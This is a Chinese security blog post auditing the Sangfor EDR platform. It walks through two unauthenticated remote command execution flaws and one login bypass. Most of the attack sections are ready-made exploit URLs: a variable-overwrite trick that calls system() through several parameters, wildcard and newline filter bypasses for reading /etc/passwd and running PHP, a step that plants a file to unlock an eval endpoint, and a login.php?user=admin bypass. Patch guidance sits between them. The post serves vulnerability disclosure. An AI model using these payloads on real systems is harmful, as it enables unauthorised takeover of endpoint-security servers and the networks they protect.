<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="深信服EDR代码审计"><meta name="keywords" content="安全研究"><meta name="author" content="gshell"><meta name="copyright" content="gshell"><title>深信服EDR代码审计 | gshell's blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.4.0'
} </script><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="gshell's blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">1.</span> <span class="toc-text">深信服EDR代码审计</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RCE1"><span class="toc-number"></span> <span class="toc-text">RCE1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RCE2"><span class="toc-number"></span> <span class="toc-text">RCE2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86"><span class="toc-number"></span> <span class="toc-text">任意用户登陆</span></a></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/bamao.jpg"></div><div class="author-info__name text-center">gshell</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">12</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">6</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">5</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">安全论坛</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.t00ls.net/">tools</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://forum.90sec.com/">90sec</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.freebuf.com/">freebuf</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.sec-in.com/">SecIN</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://bbs.pediy.com/">看雪</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://xz.aliyun.com/">先知</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.anquanke.com/">安全客</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://paper.seebug.org/">seebug</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.52bug.cn">吾爱漏洞</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.0-sec.org/">零组文库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.secpulse.com/">安全脉搏</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.shentoushi.top">渗透师</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://wiki.bylibrary.cn">白阁文库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://wooyun.laolisafe.com/">乌云漏洞库</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.butian.net/">补天</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.vulbox.com/">漏洞盒子</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.bugbank.cn/">漏洞银行</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/blog-bg.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">gshell's blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">首页</a><a class="site-page" href="/archives">安全文章</a><a class="site-page" href="/tags">渗透测试</a><a class="site-page" href="/categories">安全研究</a><a class="site-page" href="/about">关于</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">深信服EDR代码审计</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-08-23</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h5 id="深信服EDR代码审计"><a href="#深信服EDR代码审计" class="headerlink" title="深信服EDR代码审计"></a>深信服EDR代码审计</h5><span id="more"></span>

<h2 id="RCE1"><a href="#RCE1" class="headerlink" title="RCE1"></a>RCE1</h2><p><strong>漏洞描述：</strong></p>
<p>深信服终端检测平台存在远程命令执行漏洞，攻击者利用该漏洞，可在未授权的情况下向目标服务器发送恶意构造的HTTP请求，从而获得目标服务器的权限，实现远程命令执行。</p>
<p><strong>影响版本：</strong></p>
<p>漏洞影响的产品版本包括：深信服EDR 3.2.16、3.2.17、3.2.19版本，其他版本不受影响。</p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/log/c.php?strip_slashes=system&amp;host=id">https://ip/tool/log/c.php?strip_slashes=system&amp;host=id</a></p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/1.jpg"></p>
<p>查看/tool/log/c.php</p>
<p>参数带入$shou_form函数</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/2.png"></p>
<p>进入$show_form函数</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/3.png"></p>
<p>进入shou_form，直接变量覆盖参数</p>
<p>如果host参数存在输出$strip_slashes($host)，那直接构造为system(id)</p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/log/c.php?strip_slashes=system&amp;host=id">https://IP/tool/log/c.php?strip_slashes=system&amp;host=id</a></p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/log/c.php?strip_slashes=system&amp;path=id">https://IP/tool/log/c.php?strip_slashes=system&amp;path=id</a></p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/log/c.php?strip_slashes=system&amp;row=id">https://IP/tool/log/c.php?strip_slashes=system&amp;row=id</a></p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/log/c.php?strip_slashes=system&amp;limit=id">https://IP/tool/log/c.php?strip_slashes=system&amp;limit=id</a></p>
<p>都可以RCE</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/4.jpg"></p>
<p>绕过cat /etc/passwd不能执行</p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/php_cli.php?strip_slashes=system&amp;code=head">https://IP/tool/php_cli.php?strip_slashes=system&amp;code=head</a> -n 100 /et?/pas???</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/5.jpg"></p>
<p>绕过phpinfo();不能执行</p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/php_cli.php?strip_slashes=system&amp;code=phpinfo%0A()">https://IP/tool/php_cli.php?strip_slashes=system&amp;code=phpinfo%0a()</a>;</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/6.jpg"></p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/php_cli.php?code=array_map(base_convert(55490343972,10,36),array(1)">https://IP/tool/php_cli.php?code=array_map(base_convert(55490343972,10,36),array(1)</a>);</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/7.jpg"></p>
<h2 id="RCE2"><a href="#RCE2" class="headerlink" title="RCE2"></a>RCE2</h2><p>查看<a target="_blank" rel="noopener" href="https://ip/tool/php_cli.php">https://IP/tool/php_cli.php</a></p>
<p>同样，开始为回调函数，</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/8.png"></p>
<p>首先得到ldb_ext_root()的返回值为/ac/dc/ldb</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/9.png"></p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/10.jpg"></p>
<p>如果不存在/ac/dc/ldb/php/enable_dc_tool这个文件，就终止程序，如果存在，就touch一下enable_dc_tool写入时间</p>
<p>ls /ac/dc/ldb/php/</p>
<p>没有这个文件，enable_dc_tool</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/11.jpg"></p>
<p>新建移动到该目录</p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/log/c.php?strip_slashes=system&amp;host=mv%20enable_dc_tool%20/ac/dc/ldb/php/enable_dc_tool">https://IP/tool/log/c.php?strip_slashes=system&amp;host=mv%20enable_dc_tool%20/ac/dc/ldb/php/enable_dc_tool</a></p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/12.jpg"></p>
<p>接下来看代码，依然是变量覆盖$code</p>
<p>如果code参数存在输出$strip_slashes($code)，那直接构造为system(whoami)</p>
<p>?strip_slashes=system&amp;code=whoami</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/13.png"></p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/php_cli.php?strip_slashes=system&amp;code=whoami">https://IP/tool/php_cli.php?strip_slashes=system&amp;code=whoami</a></p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/14.jpg"></p>
<p>$main函数直接获取参数变量覆盖为$code，并eval，直接构造：</p>
<p><a target="_blank" rel="noopener" href="https://ip/tool/php_cli.php?code=system(id)">https://IP/tool/php_cli.php?code=system(id)</a>;</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/15.jpg"></p>
<p>修复建议：</p>
<p>目前，深信服官方已发布更新版本和修复补丁，更新至3.2.21版本或升级补丁可修复该漏洞。</p>
<p>1、深信服已经通过在线升级功能完成漏洞补丁的在线升级修复，用户开启在线升级功能后即可升级至最新版本。</p>
<p>2、针对未开通在线升级功能的用户，深信服将通过客服热线主动指导用户升级，直至升级成功。同时，用户也可以通过自行下载3.2.21版本升级安装包：<a target="_blank" rel="noopener" href="https://bbs.sangfor.com.cn/plugin.php?id=service:download&amp;action=view&amp;fid=100000022878128#/100000035115623/all/undefined">https://bbs.sangfor.com.cn/plugin.php?id=service:download&amp;action=view&amp;fid=100000022878128#/100000035115623/all/undefined</a></p>
<p>然后打开EDR管理平台后台，在系统管理–升级管理–平台和终端升级中导入该下载升级安装包，导入后，管理平台和终端将自动升级至3.2.21版本。</p>
<p>3、如暂时无法升级，可临时对深信服EDR系统服务配置IP访问权限策略，将其可访问的IP范围控制在安全可控的区域内。</p>
<p>建议使用深信服EDR系统信息系统运营者及时自查，发现存在漏洞后，按照漏洞处置建议及时进行加固处置。</p>
<h2 id="任意用户登陆"><a href="#任意用户登陆" class="headerlink" title="任意用户登陆"></a>任意用户登陆</h2><p>payload: <a target="_blank" rel="noopener" href="https://ip/ui/login.php?user=%E9%9A%8F%E4%BE%BF%E5%86%99%E4%B8%80%E7%82%B9">https://ip/ui/login.php?user=随便写一点</a></p>
<p>例如:  <a target="_blank" rel="noopener" href="https://ip/ui/login.php?user=ad%E2%80%A6">https://IP/ui/login.php?user=ad…</a></p>
<p>输入完毕以后即可直接登录平台</p>
<p><a target="_blank" rel="noopener" href="https://ip/ui/login.php?user=admin">https://IP/ui/login.php?user=admin</a></p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/16.jpg"></p>
<p>/web/ui/login.php</p>
<p>经过调试服务器上$_SERVER[“REMOTE_ADDR”]返回127.0.0.1</p>
<p>浏览当前页面的用户的 IP 地址存在并且等于127.0.0.2或者127.0.0.1，条件永为真，如果存在user参数直接免密登陆。</p>
<p><img src="/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/17.jpg"></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">gshell</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://www.gsheller.top/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">http://www.gsheller.top/2020/08/23/%E6%B7%B1%E4%BF%A1%E6%9C%8DEDR%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://www.gsheller.top">gshell's blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%AE%89%E5%85%A8%E7%A0%94%E7%A9%B6/">安全研究</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/08/24/%E5%AE%9D%E5%A1%94%E9%9D%A2%E6%9D%BFphpMyAdmin%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/"><i class="fa fa-chevron-left">  </i><span>宝塔面板phpMyAdmin未授权访问</span></a></div><div class="next-post pull-right"><a href="/2020/07/10/%E6%8E%88%E6%9D%83%E6%B5%8B%E8%AF%95%E6%8B%BF%E4%B8%8B%E6%9C%8D%E5%8A%A1%E5%99%A8/"><span>授权测试拿下服务器</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(/blog-bg.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2021 By gshell</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">低调行进，潜习安全</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>